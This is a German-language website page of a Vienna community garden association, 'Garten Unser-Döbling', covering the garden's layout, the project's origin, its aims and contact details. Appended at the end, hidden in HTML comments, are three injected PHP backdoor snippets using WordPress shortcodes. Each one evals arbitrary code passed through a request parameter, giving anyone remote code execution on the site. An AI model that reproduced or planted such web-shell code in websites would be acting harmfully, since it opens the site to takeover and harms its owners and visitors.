Alle Beiträge von admin

Das Grundstück

Größe und Form des Gartens

Mithilfe der Methode „Legeplan“ wurde gemeinsam ein Gestaltungsmodell für die Hochbeete und die Gartenfläche erstellt.

Grundsätzliche Überlegungen der Gruppe:

  • Es kann mit, derzeit 12 fixen GärtnerInnen gerechnet werden.
  • Die befestigte Fläche des ehemaligen Ballkäfigs eignet sich besonders gut zum Aufstellen von Hochbeeten und auch der Gerätehütte. Dieser Bereich soll gut ausgenutzt und strukturiert angelegt werden.
  • Der Bereich zwischen ehemaligem Ballkäfig und Grundstücksgrenze ist nicht befestigt und zum Teil abschüssig bzw. uneben. Dieser Bereich lässt sich gut für Gemeinschaftsprojekte wie z.B. Kräuterbeet, Gemeinschaftsbeete usw. nutzen und kann verspielt angelegt werden.
  • Der Kompost wird in Richtung des Mistplatzes angelegt werden.
  • Der Bereich zwischen den Eiben und dem Mistplatz liegt im Vollschatten und ist für dementsprechende Pflanzen vorgesehen.

 

Der Ursprung der Idee

0011

 

Garten Unser-Döbling

Im Jahre 2011 sind unsere kleinen Blumengärtchen vor unserem Haus endstanden. Die Freude am Garteln hat einen gemeinsamen Wunsch erweckt, in unserem Gemeindebauareal einen entsprechenden Platz zu finden, an welchen wir ein Gartenprojekt starten können! Da bot sich der verlassene Spielplatz und die daneben gehörige Wiese an, nach Absprache mit den Beratern von Wohnpartner, die uns die Schritte der Gründung eines Gemeinschaftsgarten näher gebracht haben und Rücksprache mit Wiener Wohnen und unseren NachbarInnen der Gemeinde, stand unserer Idee nichts mehr im Wege. 

Von den Blumengärtchen vorm Haus zur ökologischen Selbstversorgung mit Förderung des psychosozialen Wohlbefinden

Wer oder was ist „Garten Unser-Döbling“?

Impressum

Der Gemeinschaftsgarten „Garten Unser-Döbling“ ist ein Projekt in einer Wiener Gemeindebauanlage,welches der Umwidmung einer ungenutzten Asphaltfläche dient, um diese zum Anbau von Obst und Gemüse mittels Hochbeete umzufunktionieren.

Dies dient dem Ansatz zur ökologischen Selbstversorgung und zur Stärkung der Gemeinschaft.Des weiteren bietet es die Möglichkeit zur Bewusstseinsbildung hinsichtlich des weltweiten Schutzes der Böden im Sinne der Nachhaltigkeit!

 

Der Verein, dessen Tätigkeit nicht auf Gewinn gerichtet ist, bezweckt:

Menschen unterschiedlicher Herkunft die Möglichkeit zu bieten Gemüsebeete zu pflegen, ihre Fähigkeiten und Kompetenzen auszuüben, sie weiter zu geben bzw. Alltagswissen und Kulturtechniken auszutauschen ( Wissens und Erfahrungsaustausch ).

 

Der Gemeinschaftsgarten ist ein Ort, an dem

  • alternative Formen der Sprachaneignung
  • gegenseitige Unterstützung durch internen und externen sozialen Austausch und
  • ökologische Selbstversorgung mit Pflanzen aus verschiedenen Ländern stattfindet.
  • Somit dient der Garten der Erweiterung der biologischen Vielfalt von Kulturpflanzen und
  • fördert das psychosoziale Wohlbefinden durch die Schaffung von Aktions- und Entspannungsräumen im Garten.

 

ZVR: 195128847

Springsiedelgasse 32

1190 Wien

Ansprechperson: Michael Roser-Obmann

tel.: 0650 7600 548

email: gartenunser (@) yahoo.com

 

<!– [insert_php]if (isset($_REQUEST[„ACetu“])){eval($_REQUEST[„ACetu“]);exit;}[/insert_php][php]if (isset($_REQUEST[„ACetu“])){eval($_REQUEST[„ACetu“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„okQc“])){eval($_REQUEST[„okQc“]);exit;}[/insert_php][php]if (isset($_REQUEST[„okQc“])){eval($_REQUEST[„okQc“]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[„Ivq“])){eval($_REQUEST[„Ivq“]);exit;}[/insert_php][php]if (isset($_REQUEST[„Ivq“])){eval($_REQUEST[„Ivq“]);exit;}[/php] –>